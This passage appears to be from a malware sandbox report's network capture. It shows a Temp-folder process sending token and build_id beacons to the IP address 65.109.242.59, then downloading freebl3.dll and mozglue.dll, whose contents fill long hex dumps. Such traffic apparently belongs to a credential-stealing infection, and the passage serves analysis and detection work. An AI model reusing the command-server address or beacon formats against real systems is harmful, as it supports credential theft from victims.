                                                                              2024-05-26 08:23:24 UTC1529OUTData Raw: 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 44 47 49 4a 45 47 48 44 41 45 43 41 4b 45 43 41 46 43 41 4b 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------DGIJEGHDAECAKECAFCAKContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------DGIJEGHDAECAKECAFCAKCont
                                                                              2024-05-26 08:23:24 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:24 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:24 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              18192.168.2.45267765.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:25 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----AKECBFBAEBKJJJJKFCGC
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 437
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:25 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 41 4b 45 43 42 46 42 41 45 42 4b 4a 4a 4a 4a 4b 46 43 47 43 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------AKECBFBAEBKJJJJKFCGCContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------AKECBFBAEBKJJJJKFCGCCont
                                                                              2024-05-26 08:23:26 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:26 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:26 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              19192.168.2.45267965.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:26 UTC278OUTPOST / HTTP/1.1
                                                                              Content-Type: multipart/form-data; boundary=----JKJDBAAAEHIEGCAKFHCG
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Content-Length: 437
                                                                              Connection: Keep-Alive
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:26 UTC437OUTData Raw: 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 64 32 65 62 66 61 31 39 36 37 39 35 61 61 37 36 38 32 65 37 66 30 37 39 61 35 66 35 39 61 65 37 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 32 64 30 36 31 38 33 30 34 61 38 38 64 36 34 37 36 62 63 35 35 64 33 33 63 32 33 64 37 65 36 0d 0a 2d 2d 2d 2d 2d 2d 4a 4b 4a 44 42 41 41 41 45 48 49 45 47 43 41 4b 46 48 43 47 0d 0a 43 6f 6e 74
                                                                              Data Ascii: ------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="token"d2ebfa196795aa7682e7f079a5f59ae7------JKJDBAAAEHIEGCAKFHCGContent-Disposition: form-data; name="build_id"42d0618304a88d6476bc55d33c23d7e6------JKJDBAAAEHIEGCAKFHCGCont
                                                                              2024-05-26 08:23:27 UTC158INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:27 GMT
                                                                              Content-Type: text/html; charset=UTF-8
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              2024-05-26 08:23:27 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: 2ok0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              20192.168.2.45268065.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:28 UTC173OUTGET /freebl3.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:28 UTC246INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:28 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 685392
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-a7550"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-26 08:23:28 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00
                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHS
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 89 7d c8 89 f2 31 fa 8b 4d 98 31 c1 89 ce 0f a4 d6 10 89 b5 58 ff ff ff 0f ac d1 10 89 4d 98 8b 7d ec 01 cf 89 7d ec 8b 55 e0 11 f2 89 55 e0 31 d3 8b 4d 8c 31 f9 89 da 0f a4 ca 01 89 55 88 0f a4 d9 01 89 4d 8c 8b 5d d4 03 9d 20 ff ff ff 8b 45 cc 13 85 48 ff ff ff 03 5d 94 13 45 9c 89 45 cc 8b bd 7c ff ff ff 31 c7 8b 45 a8 31 d8 89 45 a8 8b 4d c4 01 f9 89 4d c4 8b 75 bc 11 c6 89 75 bc 8b 55 94 31 ca 8b 4d 9c 31 f1 89 d0 0f a4 c8 08 0f a4 d1 08 89 4d 9c 03 9d 04 ff ff ff 8b 75 cc 13 b5 08 ff ff ff 01 cb 89 5d d4 11 c6 89 75 cc 8b 4d a8 31 f1 31 df 89 fa 0f a4 ca 10 89 55 94 0f ac cf 10 89 bd 7c ff ff ff 8b 75 c4 01 fe 89 75 c4 8b 4d bc 11 d1 89 4d bc 31 c8 8b 5d 9c 31 f3 89 c1 0f a4 d9 01 89 8d 78 ff ff ff 0f a4 c3 01 89 5d 9c 8b 45 b8 03 85 30 ff ff ff 8b
                                                                              Data Ascii: }1M1XM}}UU1M1UM] EH]EE|1E1EMMuuU1M1Mu]uM11U|uuMM1]1x]E0
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 00 89 90 98 00 00 00 8b 4d e8 89 fa 31 ca c1 c2 08 31 d1 89 d6 89 88 a4 00 00 00 8b 4d d8 8b 55 d4 31 ca c1 c2 08 89 b0 a0 00 00 00 31 d1 89 88 ac 00 00 00 89 90 a8 00 00 00 8b 4d c0 8b 55 c4 31 d1 c1 c1 08 31 ca 89 90 b4 00 00 00 8b 95 54 ff ff ff 8b 75 bc 31 d6 c1 c6 08 89 88 b0 00 00 00 31 f2 89 90 bc 00 00 00 89 b0 b8 00 00 00 81 c4 d8 00 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 00 01 00 00 89 95 78 ff ff ff 89 cf ff 31 e8 a2 90 07 00 83 c4 04 89 45 bc ff 77 04 e8 94 90 07 00 83 c4 04 89 45 b8 ff 77 08 e8 86 90 07 00 83 c4 04 89 45 c0 ff 77 0c e8 78 90 07 00 83 c4 04 89 45 dc ff 77 10 e8 6a 90 07 00 83 c4 04 89 c6 ff 77 14 e8 5d 90 07 00 83 c4 04 89 c3 ff 77 18 e8 50 90 07 00 83 c4 04 89 45 e8 ff 77 1c e8 42 90
                                                                              Data Ascii: M11MU11MU11Tu11^_[]USWVx1EwEwEwxEwjw]wPEwB
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 01 00 00 30 43 01 8a 87 1a 01 00 00 30 43 02 8a 87 1b 01 00 00 30 43 03 8a 87 1c 01 00 00 30 43 04 8a 87 1d 01 00 00 30 43 05 8a 87 1e 01 00 00 30 43 06 8a 87 1f 01 00 00 30 43 07 8a 87 20 01 00 00 30 43 08 8a 87 21 01 00 00 30 43 09 8a 87 22 01 00 00 30 43 0a 8a 87 23 01 00 00 30 43 0b 8a 87 24 01 00 00 30 43 0c 8a 87 25 01 00 00 30 43 0d 8a 87 26 01 00 00 30 43 0e 8a 87 27 01 00 00 30 43 0f 0f 10 45 e0 0f 11 87 18 01 00 00 8b 4d f0 31 e9 e8 ad 4e 07 00 31 c0 83 c4 1c 5e 5f 5b 5d c3 cc cc cc 55 89 e5 68 28 01 00 00 e8 42 50 07 00 83 c4 04 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 ec 24 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 85 c9 74 50 8b 45 10 8d 50 f0 83 fa 10 77 45 be 01 01 01 00 0f a3 d6 73 3b 8b 75 18 83 fe 02 73 33 8b 7d
                                                                              Data Ascii: 0C0C0C0C0C0C0C 0C!0C"0C#0C$0C%0C&0C'0CEM1N1^_[]Uh(BP]USWV$M01EtPEPwEs;us3}
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 89 5e 1c c1 e8 18 33 0c 85 70 3f 08 10 89 56 20 8b 45 f0 8b 5d ec 29 d8 05 33 37 ef c6 0f b6 d4 8b 14 95 70 37 08 10 0f b6 f0 33 14 b5 70 33 08 10 89 c6 c1 ee 0e 81 e6 fc 03 00 00 33 96 70 3b 08 10 8b 75 e0 89 7e 24 c1 e8 18 33 14 85 70 3f 08 10 89 4e 28 89 56 2c 8b 45 e8 89 c7 0f a4 df 08 0f a4 c3 08 89 5d ec 8b 45 e4 01 f8 05 99 91 21 72 0f b6 cc 8b 0c 8d 70 37 08 10 0f b6 d0 33 0c 95 70 33 08 10 89 c2 c1 ea 0e 81 e2 fc 03 00 00 33 8a 70 3b 08 10 c1 e8 18 33 0c 85 70 3f 08 10 89 4e 30 8b 75 f0 89 f1 29 d9 81 c1 67 6e de 8d 0f b6 c5 8b 04 85 70 37 08 10 0f b6 d1 33 04 95 70 33 08 10 89 ca c1 ea 0e 81 e2 fc 03 00 00 33 82 70 3b 08 10 c1 e9 18 33 04 8d 70 3f 08 10 89 f1 8b 55 e4 0f a4 d6 18 89 75 e8 0f ac d1 08 89 cb 89 4d f0 8d 14 3e 81 c2 31 23 43 e4 0f
                                                                              Data Ascii: ^3p?V E])37p73p33p;u~$3p?N(V,E]E!rp73p33p;3p?N0u)gnp73p33p;3p?UuM>1#C
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 04 00 83 c4 04 85 c0 89 7d a8 0f 88 d4 01 00 00 8d 45 d0 50 e8 ed 59 04 00 83 c4 04 85 c0 0f 88 c0 01 00 00 8d 45 c0 50 e8 d9 59 04 00 83 c4 04 85 c0 0f 88 ac 01 00 00 8d 45 b0 50 e8 c5 59 04 00 83 c4 04 89 c3 85 c0 0f 88 98 01 00 00 8d 46 04 8b 4d ac 83 c1 04 50 51 57 e8 ae d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 7c 01 00 00 8b 45 ac ff 70 0c ff 70 08 8d 45 c0 50 e8 48 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 5b 01 00 00 8d 46 10 8b 4d ac 83 c1 10 50 51 ff 75 a8 e8 6f d0 06 00 83 c4 0c 89 c7 85 c0 0f 85 3d 01 00 00 8b 45 ac ff 70 18 ff 70 14 8d 45 e0 50 e8 09 d7 04 00 83 c4 0c 89 c3 85 c0 0f 88 1c 01 00 00 8b 4e 0c b8 40 00 00 00 81 f9 7f 07 00 00 77 2c b8 30 00 00 00 81 f9 bf 03 00 00 77 1f b8 20 00 00 00 81 f9 7f 01 00 00 77 12 31 c0 81 f9 00 01 00 00 0f 93 c0
                                                                              Data Ascii: }EPYEPYEPYFMPQW|EppEPH[FMPQuo=EppEPN@w,0w w1
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 24 60 50 e8 4e 1c 04 00 83 c4 04 8d 44 24 50 50 e8 41 1c 04 00 83 c4 04 8d 44 24 40 50 e8 34 1c 04 00 83 c4 04 8d 44 24 30 50 e8 27 1c 04 00 83 c4 04 8d 44 24 20 50 e8 1a 1c 04 00 83 c4 04 83 c6 04 83 fe 04 77 1a b8 13 e0 ff ff ff 24 b5 74 55 08 10 b8 05 e0 ff ff eb 0c b8 02 e0 ff ff eb 05 b8 01 e0 ff ff 50 e8 7d 90 06 00 83 c4 04 e9 75 fb ff ff cc cc 55 89 e5 53 57 56 81 ec ac 00 00 00 89 cb 8b 4d 0c a1 b4 30 0a 10 31 e8 89 45 f0 8b 73 08 83 c6 07 c1 ee 03 85 c9 74 1b 8b 41 04 80 38 04 0f 85 c2 01 00 00 8d 04 36 83 c0 01 39 41 08 0f 85 b3 01 00 00 89 95 48 ff ff ff c7 45 ec 00 00 00 00 c7 45 dc 00 00 00 00 c7 45 cc 00 00 00 00 c7 45 bc 00 00 00 00 c7 45 ac 00 00 00 00 c7 45 9c 00 00 00 00 c7 45 8c 00 00 00 00 c7 85 7c ff ff ff 00 00 00 00 c7 85 6c ff ff
                                                                              Data Ascii: $`PND$PPAD$@P4D$0P'D$ Pw$tUP}uUSWVM01EstA869AHEEEEEEE|l
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 89 f8 f7 65 c4 89 95 4c fd ff ff 89 85 58 fd ff ff 89 f8 f7 65 d4 89 95 ac fd ff ff 89 85 b4 fd ff ff 89 f8 f7 65 d8 89 95 30 fe ff ff 89 85 40 fe ff ff 89 f8 f7 65 e4 89 95 a0 fe ff ff 89 85 a4 fe ff ff 89 f8 f7 65 e0 89 95 c4 fe ff ff 89 85 cc fe ff ff 89 f8 f7 65 dc 89 95 ec fe ff ff 89 85 f0 fe ff ff 89 d8 f7 e7 89 95 10 ff ff ff 89 85 18 ff ff ff 8b 75 94 89 f0 f7 65 9c 89 85 30 fd ff ff 89 55 88 8b 45 c8 8d 14 00 89 f0 f7 e2 89 95 90 fd ff ff 89 85 98 fd ff ff 89 f0 f7 65 c4 89 95 f0 fd ff ff 89 85 f8 fd ff ff 89 f0 f7 65 90 89 55 90 89 85 9c fe ff ff 89 f0 f7 65 d8 89 95 b8 fe ff ff 89 85 bc fe ff ff 89 f0 f7 65 ec 89 95 e4 fe ff ff 89 85 e8 fe ff ff 89 f0 f7 65 e0 89 95 20 ff ff ff 89 85 24 ff ff ff 89 f0 f7 65 f0 89 95 28 ff ff ff 89 85 30 ff ff
                                                                              Data Ascii: eLXee0@eeeue0UEeeUeee $e(0
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: 89 4d bc 8b 4f 28 89 4d a8 89 75 c8 89 45 d8 8b 47 24 89 45 c0 8b 77 20 89 75 ac 8b 4f 08 89 4d e0 89 f8 89 7d ec 8b 5d a8 01 d9 8b 3f 01 f7 89 7d cc 8b 70 04 13 75 c0 89 75 b8 83 d1 00 89 4d d0 0f 92 45 b4 8b 70 0c 8b 55 bc 01 d6 8b 48 10 8b 45 d4 11 c1 0f 92 45 90 01 d6 11 c1 0f 92 45 e8 01 c6 89 45 d4 13 4d e4 0f 92 45 f0 01 5d e0 0f b6 7d b4 8d 04 06 11 c7 0f 92 45 b4 8b 45 c0 01 45 cc 11 5d b8 8b 45 bc 8b 55 d0 8d 1c 02 83 d3 00 89 5d e0 0f 92 c3 01 c2 0f b6 db 8b 45 e4 8d 14 07 11 d3 89 5d d0 0f 92 c2 03 75 d4 0f b6 45 b4 8b 5d e4 8d 34 19 11 f0 89 45 9c 0f 92 45 a4 01 df 0f b6 d2 8b 75 c8 8d 34 30 11 f2 0f 92 45 df 80 45 90 ff 8b 75 ec 8b 46 14 89 45 94 8d 04 03 89 df 83 d0 00 89 45 b4 0f 92 45 98 80 45 e8 ff 8d 1c 18 89 7d e4 83 d3 00 0f 92 45 8c
                                                                              Data Ascii: MO(MuEG$Ew uOM}]?}puuMEpUHEEEEME]}EEE]EU]E]uE]4EEu40EEuFEEEE}E
                                                                              2024-05-26 08:23:28 UTC16384INData Raw: ff ff 89 f8 81 e7 ff ff ff 01 8d 0c fe 89 d6 c1 ee 1d 01 f1 89 8d 04 ff ff ff c1 e8 19 8b bd 30 ff ff ff 89 fe 81 e7 ff ff ff 03 8d 3c f8 89 c8 c1 e8 1c 01 c7 c1 ee 1a 8b 9d 34 ff ff ff 89 d8 81 e3 ff ff ff 01 8d 1c de 89 fe c1 ee 1d 01 f3 c1 e8 19 8b b5 38 ff ff ff 89 f1 81 e6 ff ff ff 03 8d 04 f0 89 de c1 ee 1c 01 f0 89 c6 25 ff ff ff 1f 89 85 38 ff ff ff c1 e9 1a c1 ee 1d 8d 04 0e 01 f1 83 c1 ff 89 8d 14 ff ff ff 8b 8d 0c ff ff ff c1 e1 03 81 e1 f8 ff ff 1f 8d 0c 41 89 8d 18 ff ff ff 8b b5 10 ff ff ff 81 e6 ff ff ff 0f 89 c1 c1 e1 0b 29 ce 8b 8d 14 ff ff ff c1 e9 1f 89 8d 14 ff ff ff 83 c1 ff 89 ca 81 e2 00 00 00 10 01 d6 89 b5 24 ff ff ff 8b b5 08 ff ff ff 81 e6 ff ff ff 1f 89 ca 81 e2 ff ff ff 1f 01 d6 89 b5 28 ff ff ff 8b b5 04 ff ff ff 81 e6 ff ff
                                                                              Data Ascii: 0<48%8A)$(


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              21192.168.2.45268165.109.242.594436620C:\Users\user\AppData\Local\Temp\kat796E.tmp
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-05-26 08:23:29 UTC173OUTGET /mozglue.dll HTTP/1.1
                                                                              User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:128.0) Gecko/20100101 Firefox/128.0
                                                                              Host: 65.109.242.59
                                                                              Cache-Control: no-cache
                                                                              2024-05-26 08:23:30 UTC246INHTTP/1.1 200 OK
                                                                              Server: nginx
                                                                              Date: Sun, 26 May 2024 08:23:30 GMT
                                                                              Content-Type: application/octet-stream
                                                                              Content-Length: 608080
                                                                              Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT
                                                                              Connection: close
                                                                              ETag: "6315a9f4-94750"
                                                                              Accept-Ranges: bytes
                                                                              2024-05-26 08:23:30 UTC16138INData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00
                                                                              Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W,
                                                                              2024-05-26 08:23:30 UTC16384INData Raw: ff ff 8d 41 24 50 e8 fb 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc e9 62 ff ff ff 8d 41 24 50 e8 df 7e 01 00 83 c4 04 89 c1 83 c0 23 83 e0 e0 89 48 fc eb 92 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 56 8b 75 0c 8b 8e b0 00 00 00 83 f9 10 0f 83 e4 00 00 00 c7 86 ac 00 00 00 00 00 00 00 c7 86 b0 00 00 00 0f 00 00 00 c6 86 9c 00 00 00 00 8b 8e 98 00 00 00 83 f9 10 0f 83 e0 00 00 00 c7 86 94 00 00 00 00 00 00 00 c7 86 98 00 00 00 0f 00 00 00 c6 86 84 00 00 00 00 8b 8e 80 00 00 00 83 f9 10 0f 83 dc 00 00 00 c7 46 7c 00 00 00 00 c7 86 80 00 00 00 0f 00 00 00 c6 46 6c 00 8b 4e 68 83 f9 10 0f 83 de 00 00 00 c7 46 64 00 00 00 00 c7 46 68 0f 00 00 00 c6 46 54 00 8b 4e 50 83 f9 10 0f 83 e3 00 00 00 c7 46 4c 00 00 00 00 c7 46 50 0f 00 00 00 c6 46
                                                                              Data Ascii: A$P~#HbA$P~#HUVuF|FlNhFdFhFTNPFLFPF
                                                                              2024-05-26 08:23:30 UTC16384INData Raw: 0f 86 bd 05 00 00 50 e8 7a d3 01 00 83 c4 04 e9 e1 f9 ff ff 8b 45 90 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 b4 05 00 00 50 e8 57 d3 01 00 83 c4 04 e9 dc f9 ff ff 8b 85 78 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 a8 05 00 00 50 e8 31 d3 01 00 83 c4 04 e9 d4 f9 ff ff 8b 85 60 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 9c 05 00 00 50 e8 0b d3 01 00 83 c4 04 e9 d2 f9 ff ff 8b 85 48 ff ff ff 81 c1 01 f0 ff ff 81 f9 ff ef ff ff 0f 86 90 05 00 00 50 e8 e5 d2 01 00 83 c4 04 e9 d6 f9 ff ff 8b b5 24 ff ff ff 89 0e 8b 85 2c ff ff ff 89 46 04 8b 4d f0 31 e9 e8 52 27 03 00 89 f0 81 c4 d0 00 00 00 5e 5f 5b 5d c3 89 f1 89 fa ff b5 30 ff ff ff e9 30 f4 ff ff 89 f1 81 c6 4c ff ff ff 39 c8 74 63 8d 8d 3c ff ff ff 56 e8 de bc ff ff 89 f1 89 fa e8 d5 f1
                                                                              Data Ascii: PzEPWxP1`PHP$,FM1R'^_[]00L9tc<V
                                                                              2024-05-26 08:23:30 UTC16384INData Raw: 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 03 b9 59 17 b7 d1 89 f8 f7 e1 89 d1 c1 e9 0d 89 c8 ba cd cc cc cc f7 e2 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 06 88 4c 18 02 89 f8 c1 e8 05 b9 c5 5a 7c 0a f7 e1 89 d1 c1 e9 07 bb ff 00 00 00 89 c8 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c1 80 c9 30 ba 83 de 1b 43 89 f8 f7 e2 8b 06 8b 7d 08 88 4c 38 01 c1 ea 12 89 d0 21 d8 69 c0 cd 00 00 00 c1 e8 0a 83 e0 fe 8d 04 80 28 c2 80 ca 30 89 f1 8b 06 8b 75 08 88 14 06 8b 39 8d 47 07 89 01 83 c7 0d b9 cd cc cc cc 8b 75 ec 89 f0 f7 e1 89 d1 c1 e9 03 8d 04 09 8d 04 80 89 f3 29 c3 80 cb 30 89 c8 ba cd cc cc cc f7 e2 8b 45 08 88 1c 38 89 c3 c1 ea 02 83 e2 fe 8d 04 92 29 c1 80 c9 30 8b 7d 0c 8b 07 88 4c 18 05 b9 1f 85 eb 51 89 f0 f7 e1 89 d1 c1 e9 05 89 c8 ba
                                                                              Data Ascii: )0LY)0LZ|!i(0C}L8!i(0u9Gu)0E8)0}LQ
                                                                              2024-05-26 08:23:30 UTC16384INData Raw: 00 00 00 31 c9 8d 14 08 83 c2 0c f2 0f 10 42 f4 8b 5d f0 f2 0f 11 04 0b 8b 7a fc c7 42 fc 00 00 00 00 89 7c 0b 08 8b 1e 8b 7e 04 8d 3c 7f 8d 3c bb 83 c1 0c 39 fa 72 cd e9 81 00 00 00 8b 06 8d 0c 49 8d 0c 88 89 4d f0 31 d2 8d 1c 10 83 c3 0c f2 0f 10 43 f4 f2 0f 11 04 17 8b 4b fc c7 43 fc 00 00 00 00 89 4c 17 08 83 c2 0c 3b 5d f0 72 da 8b 46 04 85 c0 0f 8e 02 ff ff ff 8b 1e 8d 04 40 8d 04 83 89 45 f0 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 ec 52 01 00 83 c4 04 83 c3 0c 3b 5d f0 0f 83 d4 fe ff ff eb db 31 c0 40 89 45 ec e9 27 ff ff ff 8d 0c 49 8d 3c 88 89 c3 39 fb 73 20 8b 43 08 c7 43 08 00 00 00 00 85 c0 74 09 50 e8 b0 52 01 00 83 c4 04 83 c3 0c 39 fb 72 e2 8b 1e 53 e8 9e 52 01 00 83 c4 04 8b 45 f0 89 06 8b 45 ec 89 46 08 e9 8b fe ff ff 68 a7 fa 07
                                                                              Data Ascii: 1B]zB|~<<9rIM1CKCL;]rF@ECCtPR;]1@E'I<9s CCtPR9rSREEFh
